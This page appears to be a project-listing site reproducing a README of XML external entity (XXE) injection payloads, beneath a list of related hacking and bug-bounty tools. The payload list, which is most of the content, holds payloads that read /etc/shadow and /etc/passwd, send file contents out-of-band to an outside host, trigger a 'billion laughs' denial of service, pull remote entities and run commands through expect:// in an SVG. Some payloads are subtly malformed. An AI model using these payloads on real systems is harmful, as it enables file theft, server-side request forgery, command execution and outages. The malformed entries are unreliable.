payloadbox / Xxe Injection Payload List
Licence: mit
🎯 XML External Entity (XXE) Injection Payload List
Stars: ✠304
Labels
Projects that are alternatives of or similar to Xxe Injection Payload List
Rfi Lfi Payload List
🎯 RFI/LFI Payload List
Stars: ✠202 (-33.55%)
Mutual labels: payload, websecurity, payloads, bugbounty, bug-bounty
Sql Injection Payload List
🎯 SQL Injection Payload List
Stars: ✠716 (+135.53%)
Mutual labels: hacking, payload, websecurity, payloads, bugbounty
Xss Payload List
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Stars: ✠2,617 (+760.86%)
Mutual labels: payload, websecurity, payloads, bugbounty
Payloads
Git All the Payloads! A collection of web attack payloads.
Stars: ✠2,862 (+841.45%)
Mutual labels: hacking, cybersecurity, payload, payloads
netizenship
a commandline #OSINT tool to find the online presence of a username in popular social media websites like Facebook, Instagram, Twitter, etc.
Stars: ✠33 (-89.14%)
Mutual labels: cybersecurity, infosec, information-security, websecurity
Ssti Payloads
🎯 Server Side Template Injection Payloads
Stars: ✠150 (-50.66%)
Mutual labels: payload, websecurity, payloads, bugbounty
Security Tools
Collection of small security tools, mostly in Bash and Python. CTFs, Bug Bounty and other stuff.
Stars: ✠509 (+67.43%)
Mutual labels: hacking, infosec, bugbounty, bug-bounty
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✠32,909 (+10725.33%)
Mutual labels: hacking, payload, payloads, bugbounty
Dirsearch
Web path scanner
Stars: ✠7,246 (+2283.55%)
Mutual labels: hacking, infosec, bug-bounty, bugbounty
Hawkeye
Hawkeye filesystem analysis tool
Stars: ✠202 (-33.55%)
Mutual labels: hacking, infosec, bug-bounty
py-scripts-other
A collection of some of my scripts
Stars: ✠79 (-74.01%)
Mutual labels: cybersecurity, infosec, bugbounty
Cloudbrute
Awesome cloud enumerator
Stars: ✠268 (-11.84%)
Mutual labels: hacking, infosec, bugbounty
Awesome Bbht
A bash script that will automatically install a list of bug hunting tools that I find interesting for recon, exploitation, etc. (minus burp) For Ubuntu/Debain.
Stars: ✠190 (-37.5%)
Mutual labels: hacking, bugbounty, bug-bounty
Crithit
Takes a single wordlist item and tests it one by one over a large collection of websites before moving onto the next. Create signatures to cross-check vulnerabilities over multiple hosts.
Stars: ✠182 (-40.13%)
Mutual labels: hacking, infosec, bugbounty
Hack Tools
The all-in-one Red Team extension for Web Pentester ðŸ›
Stars: ✠2,750 (+804.61%)
Mutual labels: hacking, cybersecurity, payloads
flydns
Related subdomains finder
Stars: ✠29 (-90.46%)
Mutual labels: bug-bounty, infosec, bugbounty
Bbrecon
Python library and CLI for the Bug Bounty Recon API
Stars: ✠169 (-44.41%)
Mutual labels: hacking, cybersecurity, bugbounty
tugarecon
Pentest: Subdomains enumeration tool for penetration testers.
Stars: ✠142 (-53.29%)
Mutual labels: bug-bounty, infosec, bugbounty
Phishapi
Comprehensive Web Based Phishing Suite for Rapid Deployment and Real-Time Alerting!
Stars: ✠272 (-10.53%)
Mutual labels: hacking, infosec, cybersecurity
incident-response-plan-template
A concise, directive, specific, flexible, and free incident response plan template
Stars: ✠288 (-5.26%)
Mutual labels: cybersecurity, infosec, information-security
XML External Entity (XXE) Injection Payload List
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.
What is XML external entity injection?
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
There are various types of XXE attacks:
| XXE Attack Type | Description |
|---|---|
| Exploiting XXE to Retrieve Files | Where an external entity is defined containing the contents of a file, and returned in the application's response. |
| Exploiting XXE to Perform SSRF Attacks | Where an external entity is defined based on a URL to a back-end system. |
| Exploiting Blind XXE Exfiltrate Data Out-of-Band | Where sensitive data is transmitted from the application server to a system that the attacker controls. |
| Exploiting blind XXE to Retrieve Data Via Error Messages | Where the attacker can trigger a parsing error message containing sensitive data. |
XML External Entity (XXE) Injection Payloads
XXE: Basic XML Example
<!--?xml version="1.0" ?-->
<userInfo>
<firstName>John</firstName>
<lastName>Doe</lastName>
</userInfo>
XXE: Entity Example
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
XXE: File Disclosure
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
XXE: Denial-of-Service Example
<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>
XXE: Local File Inclusion Example
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>∾</result></foo>
XXE:SSRF ( Server Side Request Forgery ) Example
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>
XXE: UTF-7 Exmaple
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
XXE: Base64 Encoded
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
XXE: XXE inside SOAP Example
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
XXE: XXE inside SVG
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
References :
👉 XML External Entity (XXE) Processing
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].